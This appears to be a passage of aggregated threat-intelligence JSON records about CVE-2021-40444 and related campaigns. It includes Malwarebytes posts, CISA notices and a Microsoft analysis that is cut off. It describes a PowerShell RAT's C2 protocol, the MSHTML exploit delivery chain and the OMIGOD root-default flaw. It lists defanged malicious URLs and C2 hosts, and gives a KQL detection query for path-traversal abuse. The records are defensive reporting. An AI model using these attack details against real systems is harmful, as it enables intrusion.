"_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_" (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with "Madagascar" which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the "Initialize-Engine" function. This function collects the victim's info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by "|" character and at the end it add the group name and API config value. The created string is being send to the server using _Send-WebInit_ function. This function adds "INIT%%%" string to the created string and base64 encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the "Invoke-Engine" function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends "GETTASK%%" in Base64 format to its server to show it is ready to get tasks and execute them. The "IC" command is used to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be send to the server using "PUTTASK%%" command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain: ** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit: ** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc: \n**c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0** \nPowerShell Rat C2:** \nswordoke[.]com** \n** \n \n\n\n \n\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T16:35:06", "description": "The September 2021 Patch Tuesday could be remembered as the _final_ patching attempt in the PrintNightmare\u2026 nightmare. The ease with which the vulnerabilities [shrugged off the August patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) doesn\u2019t look to get a rerun. So far we haven\u2019t seen any indications that this patch is so easy to circumvent.\n\nThe total count of fixes for this Patch Tuesday tallies up to 86, including 26 for Microsoft Edge alone. Only a few of these vulnerabilities are listed as zero-days and two of them are "old friends". There is a third, less-likely-to-be-exploited one, and then we get to introduce a whole new set of vulnerabilities nicknamed OMIGOD, for reasons that will become obvious.\n\nAzure was the subject of five CVE\u2019s, one of them listed as critical. The four that affect the Open Management Infrastructure (OMI) were found by researchers, grouped together and received the nickname OMIGOD.\n\n### PrintNightmare\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a malicious printer driver to a vulnerable machine, and could use their new-found superpowers to install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe problem was made worse by significant [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) about whether PrintNightmare was a known, patched problem or an entirely new problem, and by repeated, at best partially-successful, attempts to patch it.\n\nThis month, Microsoft patched the remaining Print Spooler vulnerabilities under [CVE-2021-36958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36958>). Fingers crossed.\n\n### MSHTML\n\nThis zero-day vulnerability that felt like a ghost from the past (it involved ActiveX, remember that?) was only [found last week](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>), but has attracted significant attention. It was listed as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), a Remote Code Execution (RCE) vulnerability in Microsoft MSHTML. \n\nThreat actors were sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker was able to follow step-by-step instructions in order to launch their own attacks. Microsoft published mitigation instructions that disabled the installation of new ActiveX controls, but this turned out to be easy to work around for attackers.\n\nGiven the short window of opportunity, there was some doubt about whether a fix would be included in this Patch Tuesday, but it looks like Microsoft managed to pull it off.\n\n### DNS elevation of privilege vulnerability\n\nThis vulnerability was listed as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>) and affects systems running Windows Server 2008 R2 SP1, SP2 and Windows 7 SP1. It exists due to an application that does not properly impose security restrictions in Windows DNS. The vulnerability is listed as a zero-day because it has been publicly disclosed, not because it is actively being exploited.\n\nMicrosoft says that exploitation is \u201cless likely\u201d, perhaps because it requires initial authentication and can only be exploited locally. If these conditions are met this bug can be used to accomplish elevation of privilege (EoP). \n\n### OMIGOD\n\nOMIGOD is the name for a set of four vulnerabilities in the Open Management Infrastructure (OMI) that you will find embedded in many popular Azure services. The CVEs are:\n\n * [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>) OMI RCE Vulnerability with a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n * [CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) Open Management Infrastructure Elevation of Privilege Vulnerability\n\nThe [researchers](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) that discovered the vulnerabilities consider OMIGOD to be a result of the supply-chain risks that come with using open-source code:\n\n> Wiz\u2019s research team recently discovered a series of alarming vulnerabilities that highlight the supply chain risk of open source code, particularly for customers of cloud computing services.\n\nOMI runs as root (the highest privilege level) and is activated within Azure when users enable certain services, like distributed logging, or other management tools and services. It's likely that many users aren't even aware they have it running.\n\nThe RCE vulnerability (CVE-2021-38647) can be exploited in situations where the OMI ports are accessible to the Internet to allow for remote management. In this configuration, any user can communicate with it using a UNIX socket or via an HTTP API, and any user can abuse it to remotely execute code or escalate privileges.\n\nA coding mistake means that any incoming request to the service _without_ an authorization header has its privileges default to uid=0, gid=0, which is root. \n \nOMIGOD, right?\n\nThe researchers report that the flaw can only be used to remotely takeover a target when OMI exposes the HTTPS management port externally. This is the default configuration when installed standalone and in Azure Configuration Management or System Center Operations Manager (SCOM). Other Azure services (such as Log Analytics) do not expose this port, so in those cases the scope is limited to local privilege escalation.\n\nThey advise all Azure customers to connect to their Azure VMs and run the commands below in their terminal to ensure OMI is updated to the latest version:\n\n * For Debian systems (e.g., Ubuntu): `dpkg -l omi`\n * For Redhat based system (e.g., Fedora, CentOS, RHEL): `rpm -qa omi`\n\nIf OMI isn\u2019t installed, the commands won't return any results, and your machine isn\u2019t vulnerable. Version 1.6.8.1 is the patched version. All earlier versions need to be patched.\n\n## Update September 17, 2021\n\nAfter a proof-of-concept exploit was published on code hosting website GitHub, attackers we re noticed to be looking for Linux servers running on Microsoft\u2019s Azure cloud infrastructure. These systems are vulnerable to the security flaw called OMIGOD.\n\nAccording to reports from security researchers the attackers use the OMIGOD exploit, to deploy malware that ensnares the hacked server into cryptomining or DDoS botnets.\n\nThe post [[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-15T13:19:48", "type": "malwarebytes", "title": "[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36958", "CVE-2021-36968", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444"], "modified": "2021-09-15T13:19:48", "id": "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:09:51", "description": "Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild. \n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Microsoft Releases Mitigations and Workarounds for CVE-2021-40444 ", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T00:00:00", "id": "CISA:C70D91615E3DC8B589B493118D474566", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-09-30T19:14:09", "description": "In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\n\nThe observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled [attack surface reduction rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules?view=o365-worldwide>) to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability.\n\nThis blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at [RiskIQ conducted their own analysis](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) and coordinated with Microsoft in publishing this research.\n\n## Exploit delivery mechanism\n\nThe initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into _wabmig.exe_ (Microsoft address import tool.)\n\n\n\n_Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader\u2019s payload communicates with._\n\nContent that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document\u2019s payload executed immediately without user interaction \u2013 indicating the abuse of a vulnerability.\n\n\n\n_Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444_\n\n## DEV-0413 observed exploiting CVE-2021-40444\n\nAs part of Microsoft\u2019s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d and utilize a threat actor naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.\n\nThe infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command- and-control infrastructure as a service for cybercriminals.\n\nAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads -- activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.\n\nDue to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.\n\nThe DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\n\nIt is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.\n\n\n\n_Figure 3. Content of the original DEV-0413 email lure seeking application developers_\n\nAt least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\n\nIn a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a \u201csmall claims court\u201d legal threat.\n\n\n\n_Figure 4. Example of the \u201cSmall claims court\u201d lure utilized by DEV-0413__ _\n\n## Vulnerability usage timeline\n\nOn August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: [3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf](<https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf>)) that had been uploaded to VirusTotal on August 19, 2021. The post\u2019s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.\n\nMSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.\n\nOn September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.\n\n\n\n_Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure _\n\nMicrosoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.\n\n## Mitigating the attacks\n\nMicrosoft has confirmed that the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:\n\n * \u200bBlock all Office applications from creating child processes\n\nApply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.\n\n * Apply the security updates for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). Comprehensive updates addressing the vulnerabilities used in this campaign are available through the [September 2021 security updates](<https://msrc.microsoft.com/update-guide/>).\n * Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.\n * Use a supported platform, such as Windows 10, to take advantage of regular security updates.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>)in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>)in Microsoft Defender for Endpoint, to prevent malicious changes to security settings.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>)in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Microsoft 365 Defender detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [TrojanDownloader:O97M/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA&threatId=-2147225317>) \u2013 Detects the Word Doc files in the observed attacks\n * [TrojanDownloader:HTML/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:HTML/Donoff.SA&threatId=-2147174205>) \u2013 Detects the remotely-loaded HTML\n * [Trojan:Win32/Agent.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Agent.SA&threatId=-2147178093>) -- Detects the .inf(Dll)/CAB components in the observed attacks\n * [Trojan:Win32/CplLoader.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/CplLoader.A&threatId=-2147178092>) \u2013 Blocks Rundll32/Control abuse used in this CVE exploitation\n * [Behavior:Win32/OfficeMhtInj.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeMhtInj.A&threatId=-2147178094>) \u2013 Detects the injection into wabmig.exe\n * [TrojanDownloader:O97M/Donoff.SA!CAB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!CAB&threatId=-2147173661>) \u2013 Detects CAB files in observed attacks\n * [TrojanDownloader:O97M/Donoff.SA!Gen](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!Gen&threatId=-2147173660>) \u2013 Detects Office documents in observed attacks\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)\n * Suspicious use of Control Panel item\n\n**Microsoft Defender for Office365**\n\nMicrosoft Defender for Office 365 detects exploit documents delivered via email when detonation is enabled using the following detection names:\n\n * Trojan_DOCX_OLEAnomaly_A \n * Description = "The sample is an Office document which contains a suspicious oleobject definition."\n * Trojan_DOCX_OLEAnomaly_AB \n * Description = "The sample is an Office document which exhibits malicious template injection qualities."\n * Exploit_Office_OleObject_A \n * Description = "This sample is an Office document which exhibits malicious qualities."\n * Exploit_Office_OleObject_B \n * Description = "This sample is an Office document which exhibits malicious qualities."\n\nThe following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:\n\n * Malware campaign detected and blocked\n * Malware campaign detected after delivery\n * Email messages containing malicious file removed after delivery\n\n## Advanced hunting\n\nTo locate possible exploitation activity, run the following queries.\n\n**Relative path traversal (requires Microsoft 365 Defender)**\n\nUse the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:\n\n`DeviceProcessEvents \n| where (FileName in~('control.exe','rundll32.exe') and ProcessCommandLine has '.cpl:') \nor ProcessCommandLine matches regex @'\\\"\\.[a-zA-Z]{2,4}:\\.\\.\\/\\.\\.'`\n\n**Azure Sentinel **\n\nTo locate possible attacks that exploit the CVE-2021-40444 , Azure Sentinel customers can leverage the following detection query: [Azure Sentinel MSHTML exploit detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/MSHTMLVuln.yaml>).\n\n \n\nThe post [Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-09-15T23:40:56", "type": "mmpc", "title": "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-15T23:40:56", "id": "MMPC:795E0A765679492C51FEFA2B19EAD597", "href": "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of 